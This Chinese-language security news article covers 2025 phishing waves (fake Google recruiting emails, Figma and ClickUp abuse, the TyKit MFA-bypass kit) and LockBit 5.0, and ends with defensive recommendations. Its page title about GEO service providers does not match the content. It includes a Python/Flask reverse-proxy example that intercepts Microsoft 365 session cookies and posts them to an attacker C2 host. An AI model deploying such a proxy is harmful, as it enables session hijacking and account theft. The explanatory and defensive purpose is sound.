2026年GEO服务商深度解析:从技术流派到商业回报的五大企业全景拆解 - 品牌推荐
2026/1/18 12:55:15
一、当“Google招聘”邮件成为钓鱼入口
2025年10月,全球网络安全社区迎来一个令人不安的趋势:钓鱼攻击不仅数量激增,其技术复杂度和隐蔽性也显著升级。据知名网络安全媒体《Cyber Security News》发布的月度威胁报告,该月多起高影响力攻击均以“仿冒Google Careers招聘流程”为起点——受害者收到一封看似来自谷歌人力资源部门的邮件,内容为“恭喜您进入下一轮面试,请查看附件中的职位说明”。
然而,这份“职位说明”并非PDF或网页链接,而是一个嵌入了恶意宏的Word文档,或指向一个伪装成Google表单的钓鱼页面。更狡猾的是,整个攻击链大量依赖Google、Figma、ClickUp等用户高度信任的SaaS平台作为跳板,使得传统邮件网关和URL信誉系统几乎失效。
与此同时,一种名为 Tycoon 2FA(又称 TyKit) 的新型钓鱼即服务(Phishing-as-a-Service, PhaaS)工具频繁现身,它通过反向代理实现“中间人实时会话劫持”(Adversary-in-the-Middle, AitM),成功绕过多因素认证(MFA),直接窃取Microsoft 365和Gmail账户的活跃会话Cookie。这意味着,即便用户启用了短信验证码、TOTP甚至推送通知,攻击者仍能“合法”登录账户,而系统不会触发任何异常告警。
“这不是一次简单的钓鱼,而是一场精心编排的‘信任劫持’。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出,“攻击者不再试图突破防火墙,而是利用我们每天都在用的协作工具,把防御体系从内部瓦解。”
二、攻击全景图:从招聘骗局到虚拟化勒索
根据《Cyber Security News》联合威胁情报平台ANY.RUN的分析,2025年10月的攻击呈现出两大主线:
主线一:钓鱼攻击的“云原生化”
攻击者大规模滥用合法云服务构建多跳攻击链,典型案例如下:
Google Careers 仿冒钓鱼
邮件声称来自“Google HR”,附带一个Salesforce重定向链接(如 https://google-careers.my.salesforce.com/...),点击后跳转至Cloudflare Turnstile CAPTCHA验证页,再导向一个注册于近期的域名(如 hire.gworkmatch.com 或 satoshicommands.com)。该页面完全复刻Google登录界面,诱导用户输入账号密码。更危险的是,部分变种会要求用户“上传简历”,并提供一个.docx文件下载链接。该文档内嵌VBA宏,一旦启用,将从远程服务器下载Cobalt Strike Beacon或RAT。
Figma 原型滥用
攻击组织Storm-1747(疑似与Mamba团伙有关)利用Figma公开原型功能,创建名为“Q3财务报表_v2”的共享链接。用户点击后,被引导至一个伪造的Microsoft 365登录页。由于链接源自 figma.com 这一白名单域名,企业邮件安全系统往往放行。
ClickUp 作为跳板
钓鱼邮件包含 doc.clickup.com 链接,表面是项目文档,实则通过302重定向跳转至Azure Blob Storage托管的恶意HTML页面,最终加载TyKit钓鱼框架。
据ANY.RUN沙箱分析,仅10月就有超过1200个独立TyKit部署实例,影响金融、政府、电信等多个关键行业。
主线二:LockBit 5.0 跨平台勒索升级
在勒索软件方面,臭名昭著的LockBit团伙在其成立六周年之际,发布了 LockBit 5.0 版本。该版本首次全面支持Linux和VMware ESXi环境,标志着勒索攻击从终端设备向数据中心核心基础设施蔓延。
新版本采用DLL反射加载、代码混淆和反调试技术,能在数分钟内加密整个虚拟机集群。更令人担忧的是,其ESXi专用载荷可直接挂载虚拟磁盘(VMDK),绕过客户机操作系统,实现“宿主级”加密。欧洲、北美和亚洲多家企业因此遭遇业务中断,赎金要求普遍超过50万美元。
三、技术深潜:TyKit如何绕过MFA?
要理解为何MFA“失灵”,必须深入TyKit的工作机制。它并非传统意义上的凭证窃取工具,而是一个 AitM(Adversary-in-the-Middle)反向代理平台。
工作原理简述:
攻击者部署一个TyKit钓鱼站点(如 login-microsoft365[.]xyz);
用户访问该站点并输入账号密码;
TyKit后端实时将凭据转发至真实的Microsoft登录页面;
用户完成MFA验证(如点击Microsoft Authenticator推送);
微软返回有效的会话Cookie(如 .AspNet.Cookies、XSRF-TOKEN 等);
TyKit截获这些Cookie,并将其注入攻击者的浏览器会话;
攻击者无需密码或2FA,即可以“合法用户”身份操作邮箱、OneDrive、Teams等服务。
整个过程对用户透明——他们确实完成了MFA,系统也未记录异常登录。但会话已被“克隆”。
以下为简化版的AitM代理逻辑(Python + Flask 示例):
from flask import Flask, request, Response, session
import requests
app = Flask(__name__)
TARGET = "https://login.microsoftonline.com"
@app.route('/<path:path>', methods=['GET', 'POST'])
def proxy(path):
url = f"{TARGET}/{path}"
# 转发用户请求到真实站点
resp = requests.request(
method=request.method,
url=url,
headers={k: v for k, v in request.headers if k.lower() != 'host'},
data=request.get_data(),
cookies=request.cookies,
allow_redirects=False
)
# 检查是否为登录成功后的Set-Cookie
if 'Set-Cookie' in resp.headers:
cookie_val = resp.headers['Set-Cookie']
if 'x-ms-gateway-sso' in cookie_val or '.AspNet.Cookies' in cookie_val:
# 将有效会话Cookie发送至C2
send_to_c2(cookie_val)
# 返回响应给用户
response = Response(resp.content, resp.status_code)
for key, value in resp.headers.items():
if key.lower() != 'transfer-encoding':
response.headers[key] = value
return response
def send_to_c2(cookie):
# 实际中会加密并异步上报
requests.post("https://attacker-c2[.]com/cookie", data={"cookie": cookie})
注:此代码仅为教学演示,真实TyKit使用Node.js或Go编写,具备反沙箱、动态域名切换、C2心跳保活等高级功能。
为何静态检测失效?
钓鱼页面无恶意JavaScript(初始加载仅为HTML/CSS);
所有恶意行为发生在用户提交凭据之后;
C2通信通过HTTPS加密,且域名每日轮换;
IOC(如IP、域名)生命周期极短,平均存活<4小时。
正如芦笛所言:“基于签名的防御已经走到尽头。我们必须转向行为上下文感知——比如监测浏览器是否在非官方域名上提交了M365凭据。”
四、国内镜像:中国职场与协作平台同样面临风险
尽管上述案例集中于欧美市场,但其攻击模式对中国极具参考价值。
首先,国内企业对钉钉、飞书、腾讯文档等协作平台的依赖程度不亚于西方对Figma或ClickUp。2025年已有迹象显示,攻击者开始仿冒“飞书HR通知”或“钉钉项目评审邀请”,诱导员工点击含宏文档或跳转至钓鱼页面。
其次,国内求职市场活跃,BOSS直聘、猎聘、智联招聘等平台日均处理数百万简历投递。若攻击者伪造“大厂内推”邮件,附带“岗位JD.docm”,极易诱使求职者启用宏——尤其在校招季。
芦笛提醒:“国内很多中小企业HR仍习惯通过邮箱直接接收简历,这等于为恶意文档敞开大门。建议统一使用带沙箱扫描的企业招聘系统,禁用邮件附件中的可执行内容。”
此外,国内政务云和金融云正加速虚拟化部署。LockBit 5.0对ESXi的攻击能力,对我国关键信息基础设施构成潜在威胁。“一旦hypervisor被加密,整个云租户环境可能瘫痪。”芦笛强调,“必须对虚拟化层实施最小权限管理和实时完整性监控。”
五、防御升级:从“堵漏洞”到“建免疫”
面对此类高级持续性钓鱼与勒索威胁,专家建议采取多层次防御策略:
1. 强制推行FIDO2/WebAuthn硬件密钥认证
传统MFA(短信、TOTP、推送)在AitM面前形同虚设。而FIDO2基于公私钥体系,私钥永不离开安全芯片(如YubiKey、Titan),即使会话被劫持,也无法完成身份绑定。
微软、Google、GitHub等已全面支持。企业应优先为高管、IT、财务人员部署。
2. 对第三方SaaS链接实施浏览器隔离
通过远程浏览器隔离(Remote Browser Isolation, RBI)技术,将所有来自邮件、聊天工具的外部链接在云端沙箱中渲染,本地仅接收像素流。Citrix Secure Browser、Cloudflare Browser Isolation等方案可有效阻断TyKit类攻击。
3. 严格管控OAuth应用授权
攻击者常诱导用户授权恶意OAuth应用(如“简历解析助手”),从而获取邮箱读写权限。企业应:
审计现有第三方应用授权;
启用条件访问策略(Conditional Access),限制高风险应用;
对非必要权限(如Mail.ReadWrite、User.Export.All)默认拒绝。
4. 协作平台开启异常行为告警
在Figma、ClickUp、腾讯文档等平台,应配置:
非工作时间的大规模文档共享;
来自非常用地域的下载行为;
新建公开可编辑链接等。
5. 招聘流程标准化与安全化
所有职位申请必须通过官方招聘门户提交;
禁止HR通过个人邮箱接收带宏文档;
对上传文件自动进行沙箱 detonation 和宏剥离。
六、结语:信任不能外包,安全必须内生
2025年10月的威胁浪潮揭示了一个残酷现实:在零信任时代,最大的风险不是未知的漏洞,而是被滥用的信任。Google、Figma、ClickUp这些本应提升效率的工具,如今却成了攻击者的“绿色通道”。
但这并非技术的失败,而是安全范式的滞后。正如芦笛总结:“我们不能再把安全当作附加功能,而必须让它内生于每一个交互环节——从一封邮件的链接,到一次虚拟机的启动。”
未来,随着AI驱动的深度伪造钓鱼(如语音面试诈骗、AI生成职位描述)兴起,攻防对抗将更加激烈。唯有将行为分析、硬件认证、端点可见性与用户意识融为一体,才能在这场没有硝烟的战争中守住数字世界的最后一道防线。
编辑:芦笛(公共互联网反网络钓鱼工作组)